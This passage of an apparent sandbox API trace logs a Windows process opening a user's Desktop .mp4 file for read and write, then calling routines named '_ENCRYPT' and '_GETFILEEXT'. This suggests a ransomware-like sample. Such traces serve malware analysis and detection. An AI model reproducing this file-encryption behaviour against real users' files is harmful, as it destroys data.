Flags=0x0, Size=0x10) returned 0x9bd948 [0162.128] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0162.128] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0162.128] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0162.128] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0162.128] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0162.128] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0162.128] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0162.128] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0162.128] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0162.128] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0162.128] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0162.128] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0162.128] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0162.128] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0162.128] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0162.128] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0162.128] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0162.128] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0162.128] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0162.128] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0162.129] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0162.129] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0162.129] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0162.129] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0162.129] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bd948, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0162.129] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0162.129] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0162.129] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0162.129] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0162.129] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0162.129] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9bd948, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0162.129] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0162.129] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0162.129] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0162.129] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0162.129] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0162.129] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0162.129] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\qPUo-BPNhJloiyjRuI7.mp4", cchWideChar=83, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 83 [0162.129] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\qPUo-BPNhJloiyjRuI7.mp4", cchWideChar=83, lpMultiByteStr=0x8c4a48, cbMultiByte=83, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\qPUo-BPNhJloiyjRuI7.mp4", lpUsedDefaultChar=0x0) returned 83 [0162.129] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c4a48 | out: hHeap=0x8a0000) returned 1 [0162.129] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0162.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0162.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0162.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0162.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0162.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0162.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0162.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0162.130] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\qPUo-BPNhJloiyjRuI7.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ltz4mbbpxnfpfin1jbh3\\qpuo-bpnhjloiyjrui7.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0162.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0162.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0162.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0162.132] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x9c5180, cbMultiByte=83, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 83 [0162.132] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x9c5180, cbMultiByte=83, lpWideCharStr=0x8fcbc0, cchWideChar=83 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\qPUo-BPNhJloiyjRuI7.mp4") returned 83 [0162.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0162.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fcbc0 | out: hHeap=0x8a0000) returned 1 [0162.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c5180 | out: hHeap=0x8a0000) returned 1 [0162.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0162.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0162.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0162.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0162.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0162.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0162.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0162.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0162.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0162.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0162.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0162.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0162.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0162.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0162.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0162.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0162.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0162.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0162.134] FreeLibrary (hLibModule=0x75990000) returned 1 [0162.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0162.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0162.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0162.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0162.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0162.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0162.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0162.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0162.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0162.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0162.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0162.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0162.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0162.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0162.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0162.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0162.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0162.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0162.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0162.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0162.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0162.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0162.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0162.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0162.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0162.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0162.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0162.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0162.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0162.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0162.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0162.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0162.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0162.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0162.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0162.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0162.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0162.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0162.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0162.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0162.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0162.135] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0162.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0162.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0162.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0162.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0162.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0162.135] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0162.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0162.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0162.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0162.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0162.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0162.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0162.136] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0162.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0162.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0162.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0162.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0162.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0162.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0162.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0162.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0162.136] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0162.136] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0162.136] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd3a8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0162.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0162.136] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0162.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0162.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0162.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0162.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0162.136] CloseHandle (hObject=0x120) returned 1 [0162.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0162.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0162.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0162.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0162.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0162.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0162.137] FreeLibrary (hLibModule=0x75990000) returned 1 [0162.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0162.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0162.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0162.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0162.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0162.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0162.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0162.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0162.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0162.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0162.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0162.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0162.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0162.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0162.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0162.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0162.137] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0162.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0162.137] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0162.137] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0162.137] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0162.137] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0162.137] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0162.137] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0162.137] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0162.137] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0162.137] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0162.137] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0162.137] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0162.137] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0162.138] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0162.138] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0162.138] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0162.138] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0162.138] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0162.138] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0162.138] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp4", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0162.138] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0162.138] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0162.138] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0162.138] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0162.138] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0162.138] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0162.138] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0162.138] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb0) returned 0x8e6cd8 [0162.138] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0162.138] 